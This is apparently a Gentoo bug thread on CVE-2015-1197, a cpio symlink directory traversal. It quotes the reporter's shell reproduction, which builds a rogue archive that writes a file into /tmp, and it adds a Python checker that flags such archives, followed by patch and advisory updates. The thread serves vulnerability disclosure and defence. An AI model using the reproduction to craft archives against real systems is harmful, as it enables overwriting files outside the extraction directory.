From ${URL} : It was reported [1] that cpio is susceptible to a directory traversal vulnerability. Original report follows:

...

While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory.

Example:

1) create a sample archive:

    ln -s /tmp dir
    echo dir | cpio -oF test.cpio
    rm dir
    mkdir dir
    echo hello > dir/file
    echo dir/file | cpio -oAF test.cpio
    rm -r dir

2) test it:

    cpio --no-absolute-filenames -ivF test.cpio

This will create a symlink "dir" in the current directory and a file "/tmp/file".

...

No patches are available at this time.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
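The report above shows the two-member pattern that triggers the bug: an earlier member creates a symlink, a later member's path runs through it, and cpio 2.11 follows the link at extraction time even with --no-absolute-filenames. The following is an added example written for this page, not code from the cpio project or from the reporter, and it is not the logic of the upstream fix: it parses an archive in the SVR4 "newc" member format (magic 070701, what GNU cpio writes with -H newc; the reporter's reproduction uses the default "bin" format, which this parser does not read) and refuses, before anything is extracted, any member whose path contains ".." or passes through a symlink created by an earlier member of the same archive. The two archives at the bottom are constructed in memory: the reporter's layout (symlink "dir" -> /tmp followed by "dir/file") and a benign twin in which "dir" is a real directory.

```python
"""Pre-extraction symlink-traversal check for newc cpio archives.

Added example, not cpio's own code. Sample archives are constructed inline.
"""
S_IFMT = 0o170000
S_IFLNK = 0o120000
S_IFREG = 0o100000
S_IFDIR = 0o040000

NEWC_MAGIC = b"070701"
NEWC_HEADER_LEN = 110  # 6-byte magic + 13 fields of 8 hex digits


def _pad4(n):
    """Bytes needed to round n up to a multiple of 4 (newc alignment)."""
    return (-n) % 4


def newc_entry(name, mode, data=b"", ino=1):
    """Serialize one newc member: header, NUL-terminated name, data, each 4-aligned."""
    name_b = name.encode() + b"\0"
    # field order: ino mode uid gid nlink mtime filesize devmajor devminor
    #              rdevmajor rdevminor namesize check
    fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    header = NEWC_MAGIC + b"".join(b"%08x" % f for f in fields)
    out = header + name_b + b"\0" * _pad4(NEWC_HEADER_LEN + len(name_b))
    return out + data + b"\0" * _pad4(len(data))


def build_archive(members):
    """members: iterable of (name, mode, data). Appends the TRAILER!!! member."""
    blob = b"".join(newc_entry(n, m, d, ino=i + 1)
                    for i, (n, m, d) in enumerate(members))
    return blob + newc_entry("TRAILER!!!", 0)


def iter_entries(blob):
    """Yield (name, mode, data) for each member up to the trailer."""
    off = 0
    while off + NEWC_HEADER_LEN <= len(blob):
        if blob[off:off + 6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % off)
        hdr = blob[off + 6:off + NEWC_HEADER_LEN]
        fields = [int(hdr[i:i + 8], 16) for i in range(0, 104, 8)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = off + NEWC_HEADER_LEN
        name = blob[name_start:name_start + namesize - 1].decode()
        data_start = name_start + namesize + _pad4(NEWC_HEADER_LEN + namesize)
        if name == "TRAILER!!!":
            return
        yield name, mode, blob[data_start:data_start + filesize]
        off = data_start + filesize + _pad4(filesize)
    raise ValueError("archive ends without TRAILER!!!")


def _components(name):
    """Path parts after stripping leading '/' (what --no-absolute-filenames does)
    and dropping empty and '.' parts; '..' is kept so it can be flagged."""
    return [p for p in name.split("/") if p not in ("", ".")]


def find_unsafe_entries(blob):
    """Return [(name, reason)] for members whose extraction could leave the
    current directory: a '..' component, or a path through a symlink that an
    earlier member of the same archive creates (the cpio 2.11 pattern)."""
    symlinks = {}   # "a/b" -> target, for symlink members seen so far
    problems = []
    for name, mode, data in iter_entries(blob):
        parts = _components(name)
        reason = None
        if ".." in parts:
            reason = "contains '..'"
        else:
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in symlinks:
                    reason = "passes through symlink %s -> %s" % (prefix, symlinks[prefix])
                    break
        if reason:
            problems.append((name, reason))
        if mode & S_IFMT == S_IFLNK:
            symlinks["/".join(parts)] = data.decode()
    return problems


# Constructed sample archives: the reporter's layout (symlink "dir" -> /tmp,
# then "dir/file") and a benign twin where "dir" is a real directory.
MALICIOUS = build_archive([
    ("dir", S_IFLNK | 0o777, b"/tmp"),
    ("dir/file", S_IFREG | 0o644, b"hello\n"),
])
BENIGN = build_archive([
    ("dir", S_IFDIR | 0o755, b""),
    ("dir/file", S_IFREG | 0o644, b"hello\n"),
])

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, find_unsafe_entries(blob))
```

The check deliberately does not normalize "dir/../x" away: on a real filesystem that path resolves through the symlink "dir" first, so both the ".." and the symlink prefix are grounds for refusal. Paths are compared as they would be after --no-absolute-filenames strips the leading "/"; without that option an absolute member name is unsafe on its own and needs no symlink to escape.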
+*cpio-2.11-r2 (09 Jan 2015)
+
+  09 Jan 2015; Tony Vroon <chainsaw@gentoo.org> +cpio-2.11-r2.ebuild,
+  +files/cpio-2.11-security.patch:
+  Scavenge upstream bug fixes for heap-based buffer overflow and directory
+  traversal through symlinks. For security bugs #530512 and #536010.

Suggest stabilisation is handled in bug #530512.
This issue was resolved and addressed in GLSA 201502-11 at http://security.gentoo.org/glsa/glsa-201502-11.xml by GLSA coordinator Kristian Fiskerstrand (K_F).
CVE-2015-1197 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1197): cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.
cpio-2.11-security.patch was dropped with the 2.12 bump [1], and upstream fixed this security issue in 2.13 [2] (currently pmasked). Should this bug be reopened?

[1] https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=65dd197d2dbddb0c95bbdde6097f5cce748c1fb9
[2] https://git.savannah.gnu.org/cgit/cpio.git/commit/?id=45b0ee2b407913c533f7ded8d6f8cbeec16ff6ca